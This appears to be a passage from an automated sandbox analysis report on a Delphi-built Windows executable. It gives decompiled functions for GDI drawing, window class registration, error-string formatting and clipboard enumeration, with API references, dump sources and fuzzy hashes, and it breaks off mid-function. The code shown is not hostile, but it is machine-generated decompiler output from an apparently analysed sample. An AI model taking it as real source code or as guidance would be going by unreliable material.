                                                                        • Associated: 00000002.00000002.749779338.000000000047B000.00000008.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749823728.0000000000495000.00000008.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749839062.0000000000496000.00000004.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749850256.000000000049C000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: LongWindow$Prop
                                                                        • String ID:
                                                                        • API String ID: 3887896539-0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E00421218(void* __eax, signed int __ecx) {
                                                                        				char _v1036;
                                                                        				signed int _v1038;
                                                                        				struct tagRGBQUAD _v1048;
                                                                        				short _v1066;
                                                                        				void* _t20;
                                                                        				struct HDC__* _t25;
                                                                        				void* _t28;
                                                                        				void* _t31;
                                                                        				struct HPALETTE__* _t33;
                                                                        				LOGPALETTE* _t34;
                                                                        
                                                                        				_t31 = __eax;
                                                                        				_t33 = 0;
                                                                        				_t34->palVersion = 0x300;
                                                                        				if(__eax == 0) {
                                                                        					_v1038 = __ecx;
                                                                        					E004029BC(_t28, __ecx << 2,  &_v1036);
                                                                        				} else {
                                                                        					_t25 = CreateCompatibleDC(0);
                                                                        					_t20 = SelectObject(_t25, _t31);
                                                                        					_v1066 = GetDIBColorTable(_t25, 0, 0x100,  &_v1048);
                                                                        					SelectObject(_t25, _t20);
                                                                        					DeleteDC(_t25);
                                                                        				}
                                                                        				if(_v1038 != 0) {
                                                                        					if(_v1038 != 0x10 || E00421180(_t34) == 0) {
                                                                        						E00421010( &_v1036, _v1038 & 0x0000ffff);
                                                                        					}
                                                                        					_t33 = CreatePalette(_t34);
                                                                        				}
                                                                        				return _t33;
                                                                        			}














                                                                        APIs
                                                                        • CreateCompatibleDC.GDI32(00000000), ref: 00421231
                                                                        • SelectObject.GDI32(00000000,00000000), ref: 0042123A
                                                                        • GetDIBColorTable.GDI32(00000000,00000000,00000100,?,00000000,00000000,00000000,00000000,?,?,00424C7F,?,?,?,?,0042378B), ref: 0042124E
                                                                        • SelectObject.GDI32(00000000,00000000), ref: 0042125A
                                                                        • DeleteDC.GDI32(00000000), ref: 00421260
                                                                        • CreatePalette.GDI32 ref: 004212A6
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.749503743.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.749483060.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749763098.000000000047A000.00000004.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749779338.000000000047B000.00000008.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749823728.0000000000495000.00000008.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749839062.0000000000496000.00000004.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749850256.000000000049C000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: CreateObjectSelect$ColorCompatibleDeletePaletteTable
                                                                        • String ID:
                                                                        • API String ID: 2515223848-0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E0045BE40(void* __eax) {
                                                                        				struct tagRECT _v20;
                                                                        				struct HWND__* _t18;
                                                                        				void* _t29;
                                                                        				RECT* _t30;
                                                                        
                                                                        				_t29 = __eax;
                                                                        				ValidateRect(E0043CC2C(__eax), 0);
                                                                        				InvalidateRect(E0043CC2C(_t29), 0, 0xffffffff);
                                                                        				GetClientRect(E0043CC2C(_t29), _t30);
                                                                        				_t18 = E0043CC2C( *((intOrPtr*)(_t29 + 0x240)));
                                                                        				MapWindowPoints(E0043CC2C(_t29), _t18,  &_v20, 2);
                                                                        				ValidateRect(E0043CC2C( *((intOrPtr*)(_t29 + 0x240))), _t30);
                                                                        				return InvalidateRect(E0043CC2C( *((intOrPtr*)(_t29 + 0x240))),  &_v20, 0);
                                                                        			}








                                                                        APIs
                                                                        • ValidateRect.USER32(00000000,00000000,0045C694), ref: 0045BE50
                                                                        • InvalidateRect.USER32(00000000,00000000,000000FF,00000000,00000000,0045C694), ref: 0045BE61
                                                                        • GetClientRect.USER32 ref: 0045BE6F
                                                                        • MapWindowPoints.USER32 ref: 0045BE8F
                                                                        • ValidateRect.USER32(00000000,?,00000000,00000000,00000000,00000002,00000000,?,00000000,00000000,000000FF,00000000,00000000,0045C694), ref: 0045BEA1
                                                                        • InvalidateRect.USER32(00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,00000002,00000000,?,00000000,00000000,000000FF,00000000,00000000), ref: 0045BEB9
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.749503743.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.749483060.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749763098.000000000047A000.00000004.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749779338.000000000047B000.00000008.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749823728.0000000000495000.00000008.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749839062.0000000000496000.00000004.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749850256.000000000049C000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: Rect$InvalidateValidate$ClientPointsWindow
                                                                        • String ID:
                                                                        • API String ID: 2846033224-0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E004208FC(void* __eax) {
                                                                        				void* _t36;
                                                                        
                                                                        				_t36 = __eax;
                                                                        				UnrealizeObject(E0041FC84( *((intOrPtr*)(__eax + 0x14))));
                                                                        				SelectObject( *(_t36 + 4), E0041FC84( *((intOrPtr*)(_t36 + 0x14))));
                                                                        				if(E0041FD64( *((intOrPtr*)(_t36 + 0x14))) != 0) {
                                                                        					SetBkColor( *(_t36 + 4),  !(E0041EFA4(E0041FC48( *((intOrPtr*)(_t36 + 0x14))))));
                                                                        					return SetBkMode( *(_t36 + 4), 1);
                                                                        				} else {
                                                                        					SetBkColor( *(_t36 + 4), E0041EFA4(E0041FC48( *((intOrPtr*)(_t36 + 0x14)))));
                                                                        					return SetBkMode( *(_t36 + 4), 2);
                                                                        				}
                                                                        			}





                                                                        APIs
                                                                          • Part of subcall function 0041FC84: CreateBrushIndirect.GDI32(?), ref: 0041FD2E
                                                                        • UnrealizeObject.GDI32(00000000), ref: 00420908
                                                                        • SelectObject.GDI32(?,00000000), ref: 0042091A
                                                                        • SetBkColor.GDI32(?,00000000), ref: 0042093D
                                                                        • SetBkMode.GDI32(?,00000002), ref: 00420948
                                                                        • SetBkColor.GDI32(?,00000000), ref: 00420963
                                                                        • SetBkMode.GDI32(?,00000001), ref: 0042096E
                                                                          • Part of subcall function 0041EFA4: GetSysColor.USER32(?), ref: 0041EFAE
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.749503743.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.749483060.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749763098.000000000047A000.00000004.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749779338.000000000047B000.00000008.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749823728.0000000000495000.00000008.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749839062.0000000000496000.00000004.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749850256.000000000049C000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: Color$ModeObject$BrushCreateIndirectSelectUnrealize
                                                                        • String ID:
                                                                        • API String ID: 3527656728-0
                                                                        • Opcode ID: 2e9304bb39e578ed7576aeaf7fa11be73435d8f21738a1c2794cb36238e8a360
                                                                        • Instruction ID: 33fc0b801b1a1cbcb5887307af3aaa8169cec276aa49de2580deb539fc8c3729
                                                                        • Opcode Fuzzy Hash: 2e9304bb39e578ed7576aeaf7fa11be73435d8f21738a1c2794cb36238e8a360
                                                                        • Instruction Fuzzy Hash: DCF0BBB52041009BEF04FFBADAC794B67A8AF44309700806ABD89DF197CA29D8659739
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 88%
                                                                        			E00471C3C(void* __eax, void* __ebx, intOrPtr __edx, void* __edi, void* __esi) {
                                                                        				char _v8;
                                                                        				char _v12;
                                                                        				intOrPtr _v16;
                                                                        				char _v20;
                                                                        				char _v24;
                                                                        				char _v28;
                                                                        				void* _t46;
                                                                        				int _t56;
                                                                        				void* _t68;
                                                                        				void* _t71;
                                                                        				void* _t85;
                                                                        				intOrPtr _t89;
                                                                        				intOrPtr _t91;
                                                                        				intOrPtr _t92;
                                                                        				intOrPtr _t93;
                                                                        				intOrPtr _t94;
                                                                        				intOrPtr _t97;
                                                                        				intOrPtr _t102;
                                                                        				void* _t108;
                                                                        				intOrPtr _t110;
                                                                        				void* _t113;
                                                                        
                                                                        				_v28 = 0;
                                                                        				_t110 = __edx;
                                                                        				_t85 = __eax;
                                                                        				_push(_t113);
                                                                        				_push(0x471e1a);
                                                                        				_push( *[fs:eax]);
                                                                        				 *[fs:eax] = _t113 + 0xffffffe8;
                                                                        				if(__edx == 0) {
                                                                        					L8:
                                                                        					if( *((intOrPtr*)(_t85 + 0x20c)) == 0) {
                                                                        						L12:
                                                                        						if(_t110 != 0 &&  *((intOrPtr*)(_t110 + 0x30)) ==  *((intOrPtr*)(_t85 + 0x30))) {
                                                                        							_t92 =  *0x46af2c; // 0x46af78
                                                                        							if(E00403768(_t110, _t92) == 0) {
                                                                        								_t93 =  *0x46ab14; // 0x46ab60
                                                                        								if(E00403768(_t110, _t93) == 0) {
                                                                        									_t94 =  *0x46c2d8; // 0x46c324
                                                                        									if(E00403768(_t110, _t94) == 0 && E00471C0C(E00403524(_t110), "TDBEdit") == 0 && E00471C0C(E00403524(_t110), "TDBMemo") == 0) {
                                                                        										_t46 = E0043CF30(_t85);
                                                                        										_t132 = _t46;
                                                                        										if(_t46 != 0) {
                                                                        											E00471E48(_t85, _t110, _t132);
                                                                        											_t56 = E0043CC2C(_t110);
                                                                        											SendMessageA(E0043CC2C(_t85), 0x469, _t56, 0);
                                                                        										}
                                                                        										 *((intOrPtr*)(_t85 + 0x20c)) = _t110;
                                                                        										_t97 =  *0x429ec4; // 0x429f10
                                                                        										if(E00403768(_t110, _t97) != 0) {
                                                                        											E00408720( *((short*)(_t85 + 0x21c)),  &_v28);
                                                                        											E004365DC(_t110, _t85, _v28, _t110);
                                                                        										}
                                                                        									}
                                                                        								}
                                                                        							}
                                                                        						}
                                                                        						_pop(_t91);
                                                                        						 *[fs:eax] = _t91;
                                                                        						_push(0x471e21);
                                                                        						return E00404348( &_v28);
                                                                        					}
                                                                        					if(E0043CF30(_t85) != 0) {
                                                                        						SendMessageA(E0043CC2C(_t85), 0x469, 0, 0);
                                                                        					}
                                                                        					 *((intOrPtr*)(_t85 + 0x20c)) = 0;
                                                                        					goto L12;
                                                                        				}
                                                                        				_t68 = E00439AB4( *((intOrPtr*)(__eax + 0x30))) - 1;
                                                                        				if(_t68 >= 0) {
                                                                        					_v8 = _t68 + 1;
                                                                        					_t108 = 0;
                                                                        					do {
                                                                        						_t71 = E00439A78( *((intOrPtr*)(_t85 + 0x30)), _t108);
                                                                        						_t102 =  *0x46af2c; // 0x46af78
                                                                        						if(E00403768(_t71, _t102) != 0 && _t85 != E00439A78( *((intOrPtr*)(_t85 + 0x30)), _t108) && _t110 ==  *((intOrPtr*)(E00439A78( *((intOrPtr*)(_t85 + 0x30)), _t108) + 0x20c))) {
                                                                        							_v24 =  *((intOrPtr*)(_t110 + 8));
                                                                        							_v20 = 0xb;
                                                                        							_v16 =  *((intOrPtr*)(E00439A78( *((intOrPtr*)(_t85 + 0x30)), _t108) + 8));
                                                                        							_v12 = 0xb;
                                                                        							_t89 =  *0x495c08; // 0x468cbc
                                                                        							E0040A274(_t85, _t89, 1, _t108, _t110, 1,  &_v24);
                                                                        							E00403DA8();
                                                                        						}
                                                                        						_t108 = _t108 + 1;
                                                                        						_t16 =  &_v8;
                                                                        						 *_t16 = _v8 - 1;
                                                                        					} while ( *_t16 != 0);
                                                                        				}
                                                                        			}

























                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.749503743.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.749483060.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749763098.000000000047A000.00000004.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749779338.000000000047B000.00000008.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749823728.0000000000495000.00000008.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749839062.0000000000496000.00000004.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749850256.000000000049C000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: MessageSend
                                                                        • String ID: x@$TDBEdit$TDBMemo
                                                                        • API String ID: 3850602802-3284963328
                                                                        • Opcode ID: 5787c22cd92ee096d9780655317fffe5fa6868f4420593c71e48df5261de8e88
                                                                        • Instruction ID: d5e860475c8fb5d570ea0d8d9322d81bf70e85d28bf0087e7759142a1a5dafb3
                                                                        • Opcode Fuzzy Hash: 5787c22cd92ee096d9780655317fffe5fa6868f4420593c71e48df5261de8e88
                                                                        • Instruction Fuzzy Hash: D34190707002405BCB10FF6EC98269A77A9AF44709F60957BEC48AB3A6C678DD05CB9D
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 84%
                                                                        			E00439D3C(intOrPtr* __eax, intOrPtr __ebx, void* __edi, void* __esi) {
                                                                        				char _v68;
                                                                        				struct _WNDCLASSA _v108;
                                                                        				intOrPtr _v116;
                                                                        				signed char _v137;
                                                                        				void* _v144;
                                                                        				struct _WNDCLASSA _v184;
                                                                        				char _v188;
                                                                        				char _v192;
                                                                        				char _v196;
                                                                        				int _t47;
                                                                        				void* _t48;
                                                                        				intOrPtr _t75;
                                                                        				intOrPtr _t93;
                                                                        				intOrPtr _t97;
                                                                        				void* _t98;
                                                                        				intOrPtr* _t100;
                                                                        				void* _t104;
                                                                        
                                                                        				_t98 = __edi;
                                                                        				_t83 = __ebx;
                                                                        				_push(__ebx);
                                                                        				_v196 = 0;
                                                                        				_t100 = __eax;
                                                                        				_push(_t104);
                                                                        				_push(0x439ec7);
                                                                        				_push( *[fs:eax]);
                                                                        				 *[fs:eax] = _t104 + 0xffffff40;
                                                                        				_t84 =  *__eax;
                                                                        				 *((intOrPtr*)( *__eax + 0x98))();
                                                                        				if(_v116 != 0 || (_v137 & 0x00000040) == 0) {
                                                                        					L7:
                                                                        					 *((intOrPtr*)(_t100 + 0x174)) = _v108.lpfnWndProc;
                                                                        					_t47 = GetClassInfoA(_v108.hInstance,  &_v68,  &_v184);
                                                                        					asm("sbb eax, eax");
                                                                        					_t48 = _t47 + 1;
                                                                        					if(_t48 == 0 || E004333D8 != _v184.lpfnWndProc) {
                                                                        						if(_t48 != 0) {
                                                                        							UnregisterClassA( &_v68, _v108.hInstance);
                                                                        						}
                                                                        						_v108.lpfnWndProc = E004333D8;
                                                                        						_v108.lpszClassName =  &_v68;
                                                                        						if(RegisterClassA( &_v108) == 0) {
                                                                        							E0040B330(_t83, _t84, _t98, _t100);
                                                                        						}
                                                                        					}
                                                                        					 *0x47a8ac = _t100;
                                                                        					_t85 =  *_t100;
                                                                        					 *((intOrPtr*)( *_t100 + 0x9c))();
                                                                        					if( *((intOrPtr*)(_t100 + 0x180)) == 0) {
                                                                        						E0040B330(_t83, _t85, _t98, _t100);
                                                                        					}
                                                                        					E00408E50( *((intOrPtr*)(_t100 + 0x64)));
                                                                        					 *((intOrPtr*)(_t100 + 0x64)) = 0;
                                                                        					E0043CF3C(_t100);
                                                                        					E00437760(_t100, E0041F478( *((intOrPtr*)(_t100 + 0x68)), _t83, _t85), 0x30, 1);
                                                                        					_t117 =  *((char*)(_t100 + 0x5c));
                                                                        					if( *((char*)(_t100 + 0x5c)) != 0) {
                                                                        						E004037D8(_t100, _t117);
                                                                        					}
                                                                        					_pop(_t93);
                                                                        					 *[fs:eax] = _t93;
                                                                        					_push(0x439ece);
                                                                        					return E00404348( &_v196);
                                                                        				} else {
                                                                        					_t83 =  *((intOrPtr*)(__eax + 4));
                                                                        					if(_t83 == 0 || ( *(_t83 + 0x1c) & 0x00000002) == 0) {
                                                                        						L6:
                                                                        						_v192 =  *((intOrPtr*)(_t100 + 8));
                                                                        						_v188 = 0xb;
                                                                        						_t75 =  *0x495b10; // 0x41d584
                                                                        						E00406548(_t75,  &_v196);
                                                                        						_t84 = _v196;
                                                                        						E0040A1B8(_t83, _v196, 1, _t98, _t100, 0,  &_v192);
                                                                        						E00403DA8();
                                                                        					} else {
                                                                        						_t97 =  *0x4323f0; // 0x43243c
                                                                        						if(E00403768(_t83, _t97) == 0) {
                                                                        							goto L6;
                                                                        						}
                                                                        						_v116 = E0043CC2C(_t83);
                                                                        					}
                                                                        					goto L7;
                                                                        				}
                                                                        			}





















                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.749503743.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.749483060.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749763098.000000000047A000.00000004.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749779338.000000000047B000.00000008.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749823728.0000000000495000.00000008.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749839062.0000000000496000.00000004.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749850256.000000000049C000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: Class$InfoRegisterUnregister
                                                                        • String ID: <$C$@
                                                                        • API String ID: 3749476976-2018183516
                                                                        • Opcode ID: f13af5d5012fe8f2965f5b7121bc98c74dca3209477202ed70a0ef0fc273b36d
                                                                        • Instruction ID: 2c6ec2fd4a1584ed8ef345fd1b634a2f873c5482398d3f71bf8bca164ddd66ba
                                                                        • Opcode Fuzzy Hash: f13af5d5012fe8f2965f5b7121bc98c74dca3209477202ed70a0ef0fc273b36d
                                                                        • Instruction Fuzzy Hash: 4D417E71A003189BDB20EB65CC42BDE77E9AF48304F4054BAE849E7391DB78AD45CB59
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E00409F40(intOrPtr* __eax, intOrPtr __ecx, void* __edx, intOrPtr _a4) {
                                                                        				intOrPtr _v8;
                                                                        				intOrPtr _v12;
                                                                        				char _v273;
                                                                        				char _v534;
                                                                        				char _v790;
                                                                        				struct _MEMORY_BASIC_INFORMATION _v820;
                                                                        				char _v824;
                                                                        				intOrPtr _v828;
                                                                        				char _v832;
                                                                        				intOrPtr _v836;
                                                                        				char _v840;
                                                                        				intOrPtr _v844;
                                                                        				char _v848;
                                                                        				char* _v852;
                                                                        				char _v856;
                                                                        				char _v860;
                                                                        				char _v1116;
                                                                        				void* __edi;
                                                                        				struct HINSTANCE__* _t40;
                                                                        				intOrPtr _t51;
                                                                        				struct HINSTANCE__* _t53;
                                                                        				void* _t69;
                                                                        				long _t72;
                                                                        				void* _t73;
                                                                        				intOrPtr _t74;
                                                                        				intOrPtr _t75;
                                                                        				intOrPtr _t83;
                                                                        				intOrPtr _t86;
                                                                        				intOrPtr* _t87;
                                                                        
                                                                        				_v8 = __ecx;
                                                                        				_t73 = __edx;
                                                                        				_t87 = __eax;
                                                                        				VirtualQuery(__edx,  &_v820, 0x1c);
                                                                        				if(_v820.State != 0x1000) {
                                                                        					L2:
                                                                        					_t40 =  *0x496714; // 0x400000
                                                                        					GetModuleFileNameA(_t40,  &_v534, 0x105);
                                                                        					_v12 = E00409F34(_t73);
                                                                        					L4:
                                                                        					E00408C5C( &_v273, 0x104, E0040ACE8(0x5c, _t89) + 1);
                                                                        					_t74 = 0x40a0c0;
                                                                        					_t86 = 0x40a0c0;
                                                                        					_t83 =  *0x4077d4; // 0x407820
                                                                        					if(E00403768(_t87, _t83) != 0) {
                                                                        						_t74 = E004047F8( *((intOrPtr*)(_t87 + 4)));
                                                                        						_t69 = E00408BF8(_t74, 0x40a0c0);
                                                                        						if(_t69 != 0 &&  *((char*)(_t74 + _t69 - 1)) != 0x2e) {
                                                                        							_t86 = 0x40a0c4;
                                                                        						}
                                                                        					}
                                                                        					_t51 =  *0x495c1c; // 0x407594
                                                                        					_t16 = _t51 + 4; // 0xffe7
                                                                        					_t53 =  *0x496714; // 0x400000
                                                                        					LoadStringA(E00405AAC(_t53),  *_t16,  &_v790, 0x100);
                                                                        					E0040352C( *_t87,  &_v1116);
                                                                        					_v860 =  &_v1116;
                                                                        					_v856 = 4;
                                                                        					_v852 =  &_v273;
                                                                        					_v848 = 6;
                                                                        					_v844 = _v12;
                                                                        					_v840 = 5;
                                                                        					_v836 = _t74;
                                                                        					_v832 = 6;
                                                                        					_v828 = _t86;
                                                                        					_v824 = 6;
                                                                        					E0040932C(_v8,  &_v790, _a4, 4,  &_v860);
                                                                        					return E00408BF8(_v8, _t86);
                                                                        				}
                                                                        				_t72 = GetModuleFileNameA(_v820.AllocationBase,  &_v534, 0x105);
                                                                        				_t89 = _t72;
                                                                        				if(_t72 != 0) {
                                                                        					_t75 = _t73 - _v820.AllocationBase;
                                                                        					__eflags = _t75;
                                                                        					_v12 = _t75;
                                                                        					goto L4;
                                                                        				}
                                                                        				goto L2;
                                                                        			}

                                                                        APIs
                                                                        • VirtualQuery.KERNEL32(?,?,0000001C), ref: 00409F5D
                                                                        • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 00409F81
                                                                        • GetModuleFileNameA.KERNEL32(00400000,?,00000105), ref: 00409F9C
                                                                        • LoadStringA.USER32 ref: 0040A032
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.749503743.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.749483060.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749763098.000000000047A000.00000004.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749779338.000000000047B000.00000008.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749823728.0000000000495000.00000008.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749839062.0000000000496000.00000004.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749850256.000000000049C000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: FileModuleName$LoadQueryStringVirtual
                                                                        • String ID: x@
                                                                        • API String ID: 3990497365-1446391196
                                                                        • Opcode ID: 675b2fcfc3af4e0b804cb0a88e9fa82d5beafd49b275f10cabf8e41c51dc7240
                                                                        • Instruction ID: 8b082e9917efa6b49bae10a68e7f34f77849aa4765b44cfb24a4ba26b6d89490
                                                                        • Opcode Fuzzy Hash: 675b2fcfc3af4e0b804cb0a88e9fa82d5beafd49b275f10cabf8e41c51dc7240
                                                                        • Instruction Fuzzy Hash: CA412E70A002589BDB21DF69CD85BDAB7BCAB08304F0040FAA548F7292D7799F948F59
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E00409F3E(intOrPtr* __eax, intOrPtr __ecx, void* __edx, intOrPtr _a4) {
                                                                        				intOrPtr _v8;
                                                                        				intOrPtr _v12;
                                                                        				char _v273;
                                                                        				char _v534;
                                                                        				char _v790;
                                                                        				struct _MEMORY_BASIC_INFORMATION _v820;
                                                                        				char _v824;
                                                                        				intOrPtr _v828;
                                                                        				char _v832;
                                                                        				intOrPtr _v836;
                                                                        				char _v840;
                                                                        				intOrPtr _v844;
                                                                        				char _v848;
                                                                        				char* _v852;
                                                                        				char _v856;
                                                                        				char _v860;
                                                                        				char _v1116;
                                                                        				void* __edi;
                                                                        				struct HINSTANCE__* _t40;
                                                                        				intOrPtr _t51;
                                                                        				struct HINSTANCE__* _t53;
                                                                        				void* _t69;
                                                                        				long _t72;
                                                                        				void* _t74;
                                                                        				intOrPtr _t75;
                                                                        				intOrPtr _t77;
                                                                        				intOrPtr _t85;
                                                                        				intOrPtr _t89;
                                                                        				intOrPtr* _t92;
                                                                        
                                                                        				_v8 = __ecx;
                                                                        				_t74 = __edx;
                                                                        				_t92 = __eax;
                                                                        				VirtualQuery(__edx,  &_v820, 0x1c);
                                                                        				if(_v820.State != 0x1000) {
                                                                        					L3:
                                                                        					_t40 =  *0x496714; // 0x400000
                                                                        					GetModuleFileNameA(_t40,  &_v534, 0x105);
                                                                        					_v12 = E00409F34(_t74);
                                                                        				} else {
                                                                        					_t72 = GetModuleFileNameA(_v820.AllocationBase,  &_v534, 0x105);
                                                                        					_t101 = _t72;
                                                                        					if(_t72 != 0) {
                                                                        						_t77 = _t74 - _v820.AllocationBase;
                                                                        						__eflags = _t77;
                                                                        						_v12 = _t77;
                                                                        					} else {
                                                                        						goto L3;
                                                                        					}
                                                                        				}
                                                                        				E00408C5C( &_v273, 0x104, E0040ACE8(0x5c, _t101) + 1);
                                                                        				_t75 = 0x40a0c0;
                                                                        				_t89 = 0x40a0c0;
                                                                        				_t85 =  *0x4077d4; // 0x407820
                                                                        				if(E00403768(_t92, _t85) != 0) {
                                                                        					_t75 = E004047F8( *((intOrPtr*)(_t92 + 4)));
                                                                        					_t69 = E00408BF8(_t75, 0x40a0c0);
                                                                        					if(_t69 != 0 &&  *((char*)(_t75 + _t69 - 1)) != 0x2e) {
                                                                        						_t89 = 0x40a0c4;
                                                                        					}
                                                                        				}
                                                                        				_t51 =  *0x495c1c; // 0x407594
                                                                        				_t16 = _t51 + 4; // 0xffe7
                                                                        				_t53 =  *0x496714; // 0x400000
                                                                        				LoadStringA(E00405AAC(_t53),  *_t16,  &_v790, 0x100);
                                                                        				E0040352C( *_t92,  &_v1116);
                                                                        				_v860 =  &_v1116;
                                                                        				_v856 = 4;
                                                                        				_v852 =  &_v273;
                                                                        				_v848 = 6;
                                                                        				_v844 = _v12;
                                                                        				_v840 = 5;
                                                                        				_v836 = _t75;
                                                                        				_v832 = 6;
                                                                        				_v828 = _t89;
                                                                        				_v824 = 6;
                                                                        				E0040932C(_v8,  &_v790, _a4, 4,  &_v860);
                                                                        				return E00408BF8(_v8, _t89);
                                                                        			}
                                                                        0x0040a08d
                                                                        0x0040a0a9
                                                                        0x0040a0bc

                                                                        APIs
                                                                        • VirtualQuery.KERNEL32(?,?,0000001C), ref: 00409F5D
                                                                        • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 00409F81
                                                                        • GetModuleFileNameA.KERNEL32(00400000,?,00000105), ref: 00409F9C
                                                                        • LoadStringA.USER32 ref: 0040A032
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.749503743.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.749483060.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749763098.000000000047A000.00000004.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749779338.000000000047B000.00000008.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749823728.0000000000495000.00000008.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749839062.0000000000496000.00000004.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749850256.000000000049C000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: FileModuleName$LoadQueryStringVirtual
                                                                        • String ID: x@
                                                                        • API String ID: 3990497365-1446391196
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 68%
                                                                        			E0042FBE8(intOrPtr* __eax, void* __edx) {
                                                                        				intOrPtr* _v8;
                                                                        				void* __ecx;
                                                                        				void* __ebp;
                                                                        				void* _t16;
                                                                        				void* _t20;
                                                                        				void* _t24;
                                                                        				void* _t25;
                                                                        				signed short _t26;
                                                                        				void* _t28;
                                                                        				intOrPtr _t29;
                                                                        				intOrPtr _t38;
                                                                        				void* _t42;
                                                                        				void* _t43;
                                                                        				void* _t45;
                                                                        				void* _t48;
                                                                        				intOrPtr _t51;
                                                                        
                                                                        				_t43 = __edx;
                                                                        				_v8 = __eax;
                                                                        				 *((intOrPtr*)( *_v8 + 0x18))(_t42, _t45, _t25, _t28, _t48);
                                                                        				_push(_t51);
                                                                        				_push(0x42fc8a);
                                                                        				_push( *[fs:edx]);
                                                                        				 *[fs:edx] = _t51;
                                                                        				_t26 = EnumClipboardFormats(0);
                                                                        				_t52 = _t26;
                                                                        				if(_t26 == 0) {
                                                                        					L4:
                                                                        					_t29 =  *0x495908; // 0x41d78c
                                                                        					E0040A238(_t29, 1);
                                                                        					E00403DA8();
                                                                        					__eflags = 0;
                                                                        					_pop(_t38);
                                                                        					 *[fs:eax] = _t38;
                                                                        					return  *((intOrPtr*)( *_v8 + 0x14))(0x42fc91);
                                                                        				} else {
                                                                        					while(1) {
                                                                        						_t16 = E004224D0(_t26, _t52);
                                                                        						_t53 = _t16;
                                                                        						if(_t16 != 0) {
                                                                        							break;
                                                                        						}
                                                                        						_t26 = EnumClipboardFormats(_t26 & 0x0000ffff);
                                                                        						__eflags = _t26;
                                                                        						if(__eflags != 0) {
                                                                        							continue;
                                                                        						} else {
                                                                        							goto L4;
                                                                        						}
                                                                        						goto L6;
                                                                        					}
                                                                        					_t20 = GetClipboardData(_t26 & 0x0000ffff);
